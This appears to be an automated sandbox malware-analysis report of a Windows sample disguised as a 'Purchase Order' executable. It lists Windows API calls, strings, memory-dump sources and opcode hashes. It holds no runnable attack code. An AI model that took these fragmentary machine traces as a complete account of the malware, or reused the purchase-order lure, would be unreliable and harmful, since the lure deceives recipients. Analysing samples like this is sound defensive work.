                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              APIs
                                              • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                              • wsprintfW.USER32 ref: 00404B88
                                              • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 00405B95
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040337C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,?,0000000A), ref: 00405B9F
                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405BB1
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B8F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-4083868402
                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction ID: 9f579dd6f6e84daacee8b4087b975d8f345068127d43d06e1f6a06445f68851b
                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction Fuzzy Hash: C8D05E31101534AAC111BF448D04CDF72ACAE45344742007AF501B20A2C7B82D5186FE
                                              APIs
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Close$Enum
                                              • String ID:
                                              • API String ID: 464197530-0
                                              • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                              • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                              • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                              • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,?,0000000A), ref: 00402E8C
                                              • GetTickCount.KERNEL32 ref: 00402EAA
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                              • ShowWindow.USER32(00000000,00000005,?,00000006,?,0000000A), ref: 00402ED5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                              • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                              • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                              • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                              APIs
                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573420,004038ED,00403703,00000006,?,00000006,?,0000000A), ref: 0040392F
                                              • GlobalFree.KERNEL32(?), ref: 00403936
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403927
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-4083868402
                                              • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                              • Instruction ID: cd662c2fc9a96c5040b18d0515cf0ea54f7952519699f51ce209c07819915f51
                                              • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                              • Instruction Fuzzy Hash: 20E0C2335016209BC6215F04ED08B5E776CAF58B32F05447AF8807B26087B81C838FD8
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405BE1
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405BF1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-1876063424
                                              • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction ID: aeb767edbde6605fb3f6e877d1e8e55744b908c0e0c9ef55a7edb7ad10a4fca3
                                              • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction Fuzzy Hash: D9D05EB2414920DAC3126B04DC40D9F73ACEF11300B4A446AE440A61A1D7786C8186AD
                                              APIs
                                              • GlobalAlloc.KERNEL32(?,?), ref: 7012116A
                                              • GlobalFree.KERNEL32(00000000), ref: 701211C7
                                              • GlobalFree.KERNEL32(00000000), ref: 701211D9
                                              • GlobalFree.KERNEL32(?), ref: 70121203
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2026022448.0000000070121000.00000020.00000001.01000000.00000004.sdmp, Offset: 70120000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_70120000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: 1540ddf22e97d2b2415a9f4e55ef73754e52c426f3b39eba46273dc433e436ce
                                              • Instruction ID: 44d8144fc5f75ef9f2061966979789ff4f6cfc2d89a5f21fb3a959a4db4468c9
                                              • Opcode Fuzzy Hash: 1540ddf22e97d2b2415a9f4e55ef73754e52c426f3b39eba46273dc433e436ce
                                              • Instruction Fuzzy Hash: 6531A1B2B00201EFD300CF75FD45A6E77F8EB652127220529FA42D3B25E774E9528B25
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                              • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1989274945.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                              • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                              • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

                                              Execution Graph

                                              Execution Coverage:0%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:1
                                              Total number of Limit Nodes:0
                                              execution_graph 68229 34852b60 LdrInitializeThunk

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3 348535c0-348535cc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b99c4dd2b51a20429e6178f74b9df430374e235ee233086fc0e1be3a402f8506
                                              • Instruction ID: b6e29574545d53405f7d4cea9aaa8c49d291523866a71ae958d385cfa7992a92
                                              • Opcode Fuzzy Hash: b99c4dd2b51a20429e6178f74b9df430374e235ee233086fc0e1be3a402f8506
                                              • Instruction Fuzzy Hash: 3490027160650406D1407158451470610054BD020AF65C912A5475528D8799CA9965A3

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1 34852c70-34852c7c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2b606d97eeb3402e405ae00281af027445496f50a1ca66509e812c7b996bb1b3
                                              • Instruction ID: 7010276755b3e05b17c40a7044ae48e4de3941cee14a09affa5946ed68f864e8
                                              • Opcode Fuzzy Hash: 2b606d97eeb3402e405ae00281af027445496f50a1ca66509e812c7b996bb1b3
                                              • Instruction Fuzzy Hash: 9790027120248806D1507158840474A00054BD030AF59C912A9475618D8699C9D97122

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2 34852df0-34852dfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: aecf001217415599d23e1bf98250c0ab523c3dee2f2da30e83eb557f5675c8a6
                                              • Instruction ID: 1364c6a68445d8ccf86fb47b746de80f0cf3a08a955c5ba95418f17e05865730
                                              • Opcode Fuzzy Hash: aecf001217415599d23e1bf98250c0ab523c3dee2f2da30e83eb557f5675c8a6
                                              • Instruction Fuzzy Hash: EE90027120240417D1517158450470700094BD024AF95C913A5475518D965ACA9AA122

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 34852b60-34852b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cef2519f0cabb6da7332ff4dec8e0243dbd5e00155c599ff4cb1596cf2218ab3
                                              • Instruction ID: 66a133fd8a84b2529983cbf3d3ecab2fb0f596ab7440aa18d176596294af6528
                                              • Opcode Fuzzy Hash: cef2519f0cabb6da7332ff4dec8e0243dbd5e00155c599ff4cb1596cf2218ab3
                                              • Instruction Fuzzy Hash: 929002A120340007414571584414716400A4BE020AB55C522E6065550DC529C9D96126

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $ $0
                                              • API String ID: 3446177414-3352262554

                                              Strings
                                              • Address of the debug info found in the active list., xrefs: 348854AE, 348854FA
                                              • Critical section debug info address, xrefs: 3488541F, 3488552E
                                              • corrupted critical section, xrefs: 348854C2
                                              • Thread identifier, xrefs: 3488553A
                                              • undeleted critical section in freed memory, xrefs: 3488542B
                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 3488540A, 34885496, 34885519
                                              • Critical section address, xrefs: 34885425, 348854BC, 34885534
                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 348854CE
                                              • 8, xrefs: 348852E3
                                              • Thread is in a state in which it cannot own a critical section, xrefs: 34885543
                                              • double initialized or corrupted critical section, xrefs: 34885508
                                              • Critical section address., xrefs: 34885502
                                              • Invalid debug info address of this critical section, xrefs: 348854B6
                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 348854E2
                                              Similarity
                                              • API ID:
                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                              • API String ID: 0-2368682639

                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 3446177414-1700792311
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3480656C
                                                • Part of subcall function 348065B5: RtlDebugPrintTimes.NTDLL ref: 34806664
                                                • Part of subcall function 348065B5: RtlDebugPrintTimes.NTDLL ref: 348066AF
                                              Strings
                                              • apphelp.dll, xrefs: 34806496
                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34869A01
                                              • minkernel\ntdll\ldrinit.c, xrefs: 34869A11, 34869A3A
                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 348699ED
                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 34869A2A
                                              • LdrpInitShimEngine, xrefs: 348699F4, 34869A07, 34869A30
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-204845295
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                              • API String ID: 0-3591852110
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                              • API String ID: 3446177414-3570731704
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3483D959
                                                • Part of subcall function 34814859: RtlDebugPrintTimes.NTDLL ref: 348148F7
                                              Strings
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1975516107
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                              • API String ID: 0-3063724069
                                              Strings
                                              • @, xrefs: 3480D2AF
                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3480D146
                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 3480D196
                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3480D0CF
                                              • @, xrefs: 3480D313
                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3480D262
                                              • @, xrefs: 3480D0FD
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3480D2C3
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                              • API String ID: 0-1356375266
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-1558337705
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-523794902
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-122214566
                                              Strings
                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 34882178
                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 34882180
                                              • SXS: %s() passed the empty activation context, xrefs: 34882165
                                              • RtlGetAssemblyStorageRoot, xrefs: 34882160, 3488219A, 348821BA
                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 348821BF
                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 3488219F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                              • API String ID: 0-861424205
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-4253913091
                                              Strings
                                              • RTL: Re-Waiting, xrefs: 3488031E
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 348802E7
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 348802BD
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                              • API String ID: 0-2474120054
                                              APIs
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 348882E8
                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 348882DE
                                              • Failed to reallocate the system dirs string !, xrefs: 348882D7
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-1783798831
                                              APIs
                                              Strings
                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34894888
                                              • LdrpCheckRedirection, xrefs: 3489488F
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 34894899
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 3446177414-3154609507
                                              Strings
                                              • Kernel-MUI-Language-Allowed, xrefs: 3483527B
                                              • Kernel-MUI-Language-SKU, xrefs: 3483542B
                                              • Kernel-MUI-Language-Disallowed, xrefs: 34835352
                                              • Kernel-MUI-Number-Allowed, xrefs: 34835247
                                              • WindowsExcludedProcs, xrefs: 3483522A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                                              • API String ID: 0-941669491
                                              APIs
                                              Strings
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3481063D
                                              • kLsE, xrefs: 34810540
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
